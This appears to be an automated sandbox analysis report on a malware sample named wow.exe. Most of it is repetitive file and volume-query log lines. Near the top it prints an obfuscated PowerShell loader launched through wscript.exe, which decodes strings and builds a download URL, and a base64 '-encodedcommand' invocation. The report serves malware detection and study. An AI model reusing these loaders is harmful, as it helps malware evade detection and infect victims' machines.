e,e tea vedlumerebrbilssub[op $ unbzerralba inm brave npartspoikonp,ta]tel= l $,pelou a tonbuddtikbp roignf iso oprbr eeftnfabifornjasgsensme 1ens7 sn3');$udfordrernes229=bebrejd 'p.d$skasj.ra brpar.s f,ucouc pekholee sr cos xy.s dd ,no raw knnrefl bio sna bud,epfaboipreltwiefol( sp$canf gro rercyms p.knewrsomechrvinv,bev$forkivrohavapenlt pinert e i b.oo tnt.ie .nn c,s al)';$koalitionens=$pregnenolone94;shoepacs137 (bebrejd 'sku$s,oginclgusoreib syadislfol:besnstrosurnpalrovie ,um oveimmdl,gith atorb walscaec u=gaa( artblaehersrg.tsup-
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $uforfrdetheds181; function yasmak($unsatanical){$puritanic=3;do{$joumbos+=$unsatanical[$puritanic];$puritanic+=4} until(!$unsatanical[$puritanic])$joumbos}function seksualhygiejnen($unshowmanlike){ .($bluenoser) ($unshowmanlike)}$calamondin=yasmak 't nn onechatgra.ke w';$calamondin+=yasmak 'jo eu sbst,ccoulhari.tue innrebt';$longwise=yasmak 'formmi.osorzgavif rl,irla faent/';$stavkirkes=yasmak ' amtovel wasi n1avn2';$litterateur36='s.e[plan .oefretfus.buss inet ursamv tai brc huen npce ominibilnolitatomfima aknlenaivrghese arunc] mo: a:halsafkeelecf rulilrmyxid rtmacy,egppetrproo .at,alo nocatoop rl b = re$ .ast xtmisa gavembkudkiaccrfemkpreefors';$longwise+=yasmak 'low5 k .me 0ov snd(yaswunhi,ocnunbdnovotrawm ds sp ovenanmtfra ine1 ic0.nt. tr0kli; ro attwakvii dn un6 ba4lab;fi, k txpre6hel4no ;,cc brrdisvov : h1pra3muf4 h .qu 0sup) un f rg .nekyscg.sk,amogrn/liv2fra0ank1res0non0 pa1can0 an1mio confa.yigu.rlg e .yf fiohypxma,/kvl1br 3lns4tra. on0';$daarlighed=yasmak 'midu unsrepet arves-strafakg unepron m t';$radioactive=yasmak ' mah ertexotskipa,ts nd:,at/pol/comfnoni ilet esamdunan.ro.floe h ulis/intlordmaffjbonm ny1mani .nt tai,befbruce,uhirrjkoeyfisater4apajdahnophrweebsvvyforb a3ly 4b,f/ ovodepuhomt resforoh ba .ar if. artpelo r c';$stbeformens=yasmak 'san>';$bluenoser=yasmak 'skriproetilx';$courtmartial='hale';$bacillebrerens='\autonephrectomy.noc';seksualhygiejnen (yasmak 'pre$forghjelundoschb moahallstr:sheunadndescfrduinhss.ohalfif nolanngare ordpr =ord$ saehypnpr.vbe,: uda rsp n ppaud ekaviqt fuamal+bre$lambpora apcouti ,ol arls.re rybover.nme torforet ln.eas');seksualhygiejnen (yasmak 'sla$ cog halsjao,kibmura pplrec:illma hybors cetthripolk te,ipr u.efannhal1enr4ant1 el= nn$ esr akaligdg vicomoubna gicsanterii,akvfore ,a.kursmagp,ncl uiit ot in(kmp$rousafstde bobsetenf ceodacr pamflie r npl slas)');seksualhygiejnen (yasmak $litterateur36);$radioactive=$mystikeren141[0];$recognise=(yasmak 'kip$lgfgboolpreo dabxenafinlpre:na echentrnastymhaleunml jai h,nbligu.hsela=spanfuledecw os- .io xcbo vjindecouc ,vt p mos.oaypres ibt flesc mr.l.rad$ekscfuga ptl ,rali,meksostunsupdupcikjon');seksualhygiejnen ($recognise);seksualhygiejnen (yasmak ' uf$ b e denwuzacymmpreemi,l leibernstagsubso e. dhblye ala .odsp ebi,runcske,[abi$waldor.awyvakilrbryl,ntit,lglarhbese,epded ]myr=sys$.palkonoretnnongg nwstuia.tsejee');$upcutting173=yasmak 's g$ju,epr.nchuafalma,re brlreris lnskagchus kr.diadmoyo tewtr nb tlglao poaak dthyfbe.ihyll unegem(phi$sipr inasupdsariuncooveait ctaatfo irunvhj e h ,ta $ irv ,ii otdrepe anbfloe .og yprh,oetoftblosla,1 ud7 l 9d k)';$videbegrets179=$uncushioned;seksualhygiejnen (yasmak 'p r$ igsqulselopl bbeha arlska:scrscoittafrc aufrdkpertbaku ivrar.eus.rsape ,us pr=pa (coltsple brs batb l-ab.pblaa et lahdec ser$ .avloci edve eph bligecligtror aeo,etflesfra1de,7s e9dev)');while (!$struktureres
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajafcanqb1acmapgagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaa8acmaeabhahmavwbkahuatqbxacmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajafyabgbcahyarwbfadkasgblacmapgagac0argbvahiaywblacaapaajahmaoabkadaaiwa+aa=="
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00454610 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,GetLastError,HeapAlloc,InitializeSecurityDescriptor,GetLastError,GetTokenInformation,GetLastError,GetTokenInformation,GetLastError,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,GetLengthSid,GetLengthSid,GetLengthSid,GetLengthSid,HeapAlloc,InitializeAcl,GetLastError,AddAccessAllowedAce,GetLastError,AddAccessAllowedAce,GetLastError,AddAccessAllowedAce,GetLastError,AddAccessAllowedAce,GetLastError,SetSecurityDescriptorDacl,GetLastError,CloseHandle,HeapFree,HeapFree,16_2_00454610
                            Source: traf.exe, 0000000F.00000002.2653560633.0000000002730000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                            Source: traf.exe, 0000000F.00000002.2653560633.0000000002730000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: f+SDefaultShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells/NoUACCheck/NoShellRegistrationAndUACCheck/NoShellRegistrationCheckProxy DesktopProgmanLocal\ExplorerIsShellMutex
                            Source: C:\Users\user\Desktop\wow.exeCode function: 0_2_00007FF6D80DA7E0 cpuid 0_2_00007FF6D80DA7E0
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_05276298
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,GetACP,16_2_0527D4D4
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,16_2_0527C018
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,16_2_0527C064
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,16_2_052763A4
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\attrs-24.2.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\attrs-24.2.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\attrs-24.2.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\attrs-24.2.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\certifi VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\charset_normalizer VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography-43.0.3.dist-info\license_files VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography-43.0.3.dist-info\license_files VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pyreadline3-3.5.4.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pyreadline3-3.5.4.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pyreadline3-3.5.4.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pyreadline3-3.5.4.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pyreadline3-3.5.4.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\wheel-0.45.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\wheel-0.45.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\wheel-0.45.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\wheel-0.45.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\wheel-0.45.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\wheel-0.45.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\win32 VolumeInformationJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\_ctypes.pyd VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\win32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pywin32_system32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\attrs-24.2.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\certifi VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\charset_normalizer VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pyexpat.pyd VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\python311.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pywin32_system32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\VCRUNTIME140_1.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\win32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\win32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\win32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\win32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pywin32_system32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pywin32_system32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
